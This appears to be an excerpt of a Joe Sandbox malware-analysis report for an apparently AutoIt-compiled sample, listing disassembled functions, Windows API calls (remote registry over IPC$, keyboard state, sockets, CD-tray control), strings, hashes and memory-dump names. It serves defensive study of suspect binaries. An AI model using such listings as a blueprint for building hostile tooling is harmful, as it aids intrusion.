String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 0a1d2bc6ede17052762d9b1aa9b79d9c4d354506048849a2dd4af9bcdc549bfa
Instruction ID: 899673dd31be44d91344bd30feb1a214ea9cbeea16d4bb96536a8fae1fd1dfcc
Opcode Fuzzy Hash: 0a1d2bc6ede17052762d9b1aa9b79d9c4d354506048849a2dd4af9bcdc549bfa
Instruction Fuzzy Hash: 8F518D7190011AAADF15EBE0CD42EEEB778EF14341F140265F905B20A2EB356F98EB61

Function 00C5A802 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

CharLowerBuffW.USER32(?,?), ref: 00C5A87B
GetDriveTypeW.KERNEL32 ref: 00C5A8C8
mciSendStringW.WINMM(?,00000000,00000000,00000000, type cdaudio alias cd wait,?,open ), ref: 00C5A910
mciSendStringW.WINMM(?,00000000,00000000,00000000, wait,?,set cd door ), ref: 00C5A947
mciSendStringW.WINMM(?,00000000,00000000,00000000,close cd wait), ref: 00C5A975

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Strings

open , xrefs: 00C5A8D7
set cd door , xrefs: 00C5A916
close cd wait, xrefs: 00C5A960
closed, xrefs: 00C5A88F, 00C5A898
open, xrefs: 00C5A8A2
type cdaudio alias cd wait, xrefs: 00C5A8F3
wait, xrefs: 00C5A932
close, xrefs: 00C5A881

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 85b282804b0e516de2ea460ee04d11241fe1bb5ee2d9a86a8176e7251e82c68f
Instruction ID: 34251125f850e2f94c9d5a85f534ea92ad3d2bcde4d42406f60b50ccb073c3c3
Opcode Fuzzy Hash: 85b282804b0e516de2ea460ee04d11241fe1bb5ee2d9a86a8176e7251e82c68f
Instruction Fuzzy Hash: 39516F75104305AFC700EF21C89196BB7E4FF85758F14496CF89997291DB31EE09DB92

Function 00C5A69F Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C5A6BF
__swprintf.LIBCMT ref: 00C5A6E1
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5A71E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C5A743
_memset.LIBCMT ref: 00C5A762
_wcsncpy.LIBCMT ref: 00C5A79E
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C5A7D3
CloseHandle.KERNEL32(00000000), ref: 00C5A7DE
RemoveDirectoryW.KERNEL32(?), ref: 00C5A7E7
CloseHandle.KERNEL32(00000000), ref: 00C5A7F1

Strings

\, xrefs: 00C5A6F7
:, xrefs: 00C5A702
\??\%s, xrefs: 00C5A6DB

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c16f441214d1d3348743d247a172e4dfc7b9d0f4acd8c9db7c1211bef7b492d3
Instruction ID: 4124ca6767e906098d5c63c8a769d96cab53298bf2282854e255b6c1920726c1
Opcode Fuzzy Hash: c16f441214d1d3348743d247a172e4dfc7b9d0f4acd8c9db7c1211bef7b492d3
Instruction Fuzzy Hash: 6B31B27550020AABDB209FA1DC49FEF73BCEF89741F2041A6F919D2160E77097888B28

Function 00C7C5CF Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C7C61F
GetFocus.USER32 ref: 00C7C62F
GetDlgCtrlID.USER32(00000000), ref: 00C7C63A
_memset.LIBCMT ref: 00C7C765
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C7C790
GetMenuItemCount.USER32(?), ref: 00C7C7B0
GetMenuItemID.USER32(?,00000000), ref: 00C7C7C3
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C7C7F7
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C7C83F
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C7C877
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C7C8AC

Strings

0, xrefs: 00C7C75D

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 4b7a7bedb2a91ccabdb0246daa1ed2cf60fccd38fa1f081b264785ad2cf95381
Instruction ID: 71ce4c72e29ec4b7cb4a400f7a957fd543502daa32ea2db540f9aa7e6f0a8c3e
Opcode Fuzzy Hash: 4b7a7bedb2a91ccabdb0246daa1ed2cf60fccd38fa1f081b264785ad2cf95381
Instruction Fuzzy Hash: 6C816C715083029FD714CF14C8C5AAEBBE8FB88314F14892EF9A997291D770D945DBA2

Function 00C488AD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C48C1F
Part of subcall function 00C48C03: GetLastError.KERNEL32(?,00C486E3,?,?,?), ref: 00C48C29
Part of subcall function 00C48C03: GetProcessHeap.KERNEL32(00000008,?,?,00C486E3,?,?,?), ref: 00C48C38
Part of subcall function 00C48C03: HeapAlloc.KERNEL32(00000000,?,00C486E3,?,?,?), ref: 00C48C3F
Part of subcall function 00C48C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48C56

Part of subcall function 00C48CA0: GetProcessHeap.KERNEL32(00000008,00C486F9,00000000,00000000,?,00C486F9,?), ref: 00C48CAC
Part of subcall function 00C48CA0: HeapAlloc.KERNEL32(00000000,?,00C486F9,?), ref: 00C48CB3
Part of subcall function 00C48CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C486F9,?), ref: 00C48CC4

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C48911
_memset.LIBCMT ref: 00C48926
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C48945
GetLengthSid.ADVAPI32(?), ref: 00C48956
GetAce.ADVAPI32(?,00000000,?), ref: 00C48993
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C489AF
GetLengthSid.ADVAPI32(?), ref: 00C489CC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C489DB
HeapAlloc.KERNEL32(00000000), ref: 00C489E2
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C48A03
CopySid.ADVAPI32(00000000), ref: 00C48A0A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C48A3B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C48A61
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C48A75

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: ae1115c6c59a813165a2973b19ef92c2a9c06d17d2f05127770551d7c2f8bea6
Instruction ID: eff17934d6c6f1303a67fb14bf573462990389052a1f759326af22a6e6ad0c88
Opcode Fuzzy Hash: ae1115c6c59a813165a2973b19ef92c2a9c06d17d2f05127770551d7c2f8bea6
Instruction Fuzzy Hash: 93614971900209AFDF01DFA5DC89FEEBB79FF04310F14812AF925A6290DB759A09DB64

Function 00C5A2FA Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C5A341

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00C5A363
__swprintf.LIBCMT ref: 00C5A3BC
__swprintf.LIBCMT ref: 00C5A3D5
_wprintf.LIBCMT ref: 00C5A48B
_wprintf.LIBCMT ref: 00C5A4A9

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00C5A486
"%s" (%d) : ==> %s:, xrefs: 00C5A4A4
^ ERROR, xrefs: 00C5A42D
Error: , xrefs: 00C5A453
Line %d (File "%s"):, xrefs: 00C5A3B6, 00C5A3CF

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: cd53727eb329dc4698d0c88073aac619c1e0c173e36a0fb712abf36a04f114e7
Instruction ID: 34abc0ddce7a9ab76680318cb242edcfba70f10356f36328b31309214f312286
Opcode Fuzzy Hash: cd53727eb329dc4698d0c88073aac619c1e0c173e36a0fb712abf36a04f114e7
Instruction Fuzzy Hash: E451B07190010ABADF15EBE0CD96EEEF778EF04341F144265F905A21A1EB316F98EB61

Function 00C481DD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

_memset.LIBCMT ref: 00C4826C
WNetAddConnection2W.MPR(?,?,?,00000000,\IPC$,?), ref: 00C482A1
RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C482BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C482D9
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C48303
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C4832B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C48336
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C4833B

Strings

\CLSID, xrefs: 00C48223
SOFTWARE\Classes\, xrefs: 00C4820D
\IPC$, xrefs: 00C48283

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 1b449328d8ed97fbd3da88932ad37d7417d8daa38fec203772ef64f5585c271a
Instruction ID: 0c1e6ff9bc95ee358ffb5e6540273717969bef2e4273bdbf8f69101db4cd48eb
Opcode Fuzzy Hash: 1b449328d8ed97fbd3da88932ad37d7417d8daa38fec203772ef64f5585c271a
Instruction Fuzzy Hash: FD41F472C1022DAFDB21EBA4DC95AEDB778FF04740F144129F911A21A1EB71AE08DB90

Function 00C54A79 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

#115.WSOCK32(00000101,?), ref: 00C54A94
#57.WSOCK32(?,00000100), ref: 00C54AAE
#52.WSOCK32(?), ref: 00C54ABB
_wcscpy.LIBCMT ref: 00C54AE3
_memmove.LIBCMT ref: 00C54AF6
#11.WSOCK32(?), ref: 00C54B01
_strcat.LIBCMT ref: 00C54B0F
_wcscpy.LIBCMT ref: 00C54B26
#116.WSOCK32 ref: 00C54B34
_wcscpy.LIBCMT ref: 00C54B42

Strings

0.0.0.0, xrefs: 00C54ADD

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _wcscpy$#115#116_memmove_strcat
String ID: 0.0.0.0
API String ID: 1745391200-3771769585
Opcode ID: 72991a1d7371fd27f11f4741dee998e75ad5008bdb7faf17730e89e721edac76
Instruction ID: 8cf07aaca02c8e2538da5f19193442f63f92bf67657a60e972d3e808e9929482
Opcode Fuzzy Hash: 72991a1d7371fd27f11f4741dee998e75ad5008bdb7faf17730e89e721edac76
Instruction Fuzzy Hash: BD113A36904118ABDBA4ABB09C0AFDE77BCDF02715F1401A5F40597092EF70DAC9AB99

Function 00C50687 Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C50702
SetKeyboardState.USER32(?), ref: 00C5076D
GetAsyncKeyState.USER32(000000A0), ref: 00C5078D
GetKeyState.USER32(000000A0), ref: 00C507A4
GetAsyncKeyState.USER32(000000A1), ref: 00C507D3
GetKeyState.USER32(000000A1), ref: 00C507E4
GetAsyncKeyState.USER32(00000011), ref: 00C50810
GetKeyState.USER32(00000011), ref: 00C5081E
GetAsyncKeyState.USER32(00000012), ref: 00C50847
GetKeyState.USER32(00000012), ref: 00C50855
GetAsyncKeyState.USER32(0000005B), ref: 00C5087E
GetKeyState.USER32(0000005B), ref: 00C5088C

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: bcc1f5f855fa5b58727450185a03971795ff27ab240f31f6be9f0e94d803a39c
Instruction ID: 80b25175b041697626083917879e91e54eab6918db29ad7d31c173d40f198b41
Opcode Fuzzy Hash: bcc1f5f855fa5b58727450185a03971795ff27ab240f31f6be9f0e94d803a39c
Instruction Fuzzy Hash: BE51FC3890478829FB35E77088157ABBFB49F01341F18459D9DD2971C3DA64ABCCCBA9

Function 00C4CBE3 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C4CBFF
GetWindowRect.USER32(00000000,?), ref: 00C4CC11
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C4CC6F
GetDlgItem.USER32(?,00000002), ref: 00C4CC7A
GetWindowRect.USER32(00000000,?), ref: 00C4CC8C
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C4CCE0
GetDlgItem.USER32(?,000003E9), ref: 00C4CCEE
GetWindowRect.USER32(00000000,?), ref: 00C4CCFF
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C4CD42
GetDlgItem.USER32(?,000003EA), ref: 00C4CD50
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C4CD6D
InvalidateRect.USER32(?,00000000,00000001), ref: 00C4CD7A

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: bb5c17b7977113f57cb710e9ebd2016147115ce42fbffb1f096a9512dea7906c
Instruction ID: 5d23901899da5f2c51d6ba869fd0d4b1779e328a758ef749c14f27b60670dfce
Opcode Fuzzy Hash: bb5c17b7977113f57cb710e9ebd2016147115ce42fbffb1f096a9512dea7906c
Instruction Fuzzy Hash: 0A512F71B00605AFDB58CF69DD89BAEBBB6FF88310F248129F915D7290D770AE048B54

Function 00BF23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2412,?,00000000,?,?,?,?,00BF1AA7,00000000,?), ref: 00BF1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BF24AF
KillTimer.USER32(?,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00BF254A
DestroyAcceleratorTable.USER32(00000000), ref: 00C2BF17
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2BF48
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2BF5F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2BF7B
DeleteObject.GDI32(00000000), ref: 00C2BF8D

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e20461cd321fa6f5ff49552bd87408f6e78d1596bc5b663be77e53b801fd63c8
Instruction ID: 939c11a410039abd5c2292e6562172d818ec11a5825552e1d6ae500f36e8b6c6
Opcode Fuzzy Hash: e20461cd321fa6f5ff49552bd87408f6e78d1596bc5b663be77e53b801fd63c8
Instruction Fuzzy Hash: A661DC31100629DFDB259F58DE88B3A77F1FF40316F208668E25257AA0C779AC98DF90

Function 00BF2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00BF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BF29BC

GetSysColor.USER32(0000000F), ref: 00BF25AF

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 31003e04bd58f8845258e3fba3a4c987e1beae8d762f9beb9bd51e1db53df1c1
Instruction ID: 468028999ea0537ced831ccf7db9f8fc0fc4292755b801ff08c1d233bfd3741d
Opcode Fuzzy Hash: 31003e04bd58f8845258e3fba3a4c987e1beae8d762f9beb9bd51e1db53df1c1
Instruction Fuzzy Hash: 3241A431000114ABDB259F28DC88BBD3BA5EB16331F2542A5FE658B1E2D7308D45EB25

Function 00C029BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00C10AB6: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C02A3E,?,00008000), ref: 00C10AD2

Part of subcall function 00C101AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C02A58,?,00008000), ref: 00C101CF

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C02ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00C02C2C

Part of subcall function 00C03EBE: _wcscpy.LIBCMT ref: 00C03EF6

Part of subcall function 00C1379F: _iswctype.LIBCMT ref: 00C137A7

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C3FC97
EA06, xrefs: 00C3FCC8
AU3!, xrefs: 00C02A93
Unterminated string, xrefs: 00C40056
Bad directive syntax error, xrefs: 00C4000F
Error opening the file, xrefs: 00C3FCB3, 00C3FD2A

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: e76d85d7012a25b4bd935b6f11b87770ccc2b2235866e0e09d0e3c6495656b64
Instruction ID: ba6749a39c60d9d69a5980f2865fda8afc062f744745cc811a3e7e5bee4f7083
Opcode Fuzzy Hash: e76d85d7012a25b4bd935b6f11b87770ccc2b2235866e0e09d0e3c6495656b64
Instruction Fuzzy Hash: DA02A1705083419FD724EF24C881AAFBBE5FF99314F14492DF595932A2DB30DA4AEB42

Function 014DC768 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 014DC863
type_info::operator==.LIBVCRUNTIME ref: 014DC88A
___TypeMatch.LIBVCRUNTIME ref: 014DC996
CatchIt.LIBVCRUNTIME ref: 014DC9EB
IsInExceptionSpec.LIBVCRUNTIME ref: 014DCA71
_UnwindNestedFrames.LIBCMT ref: 014DCAF8
CallUnexpected.LIBVCRUNTIME ref: 014DCB13

Strings

csm, xrefs: 014DC8C1
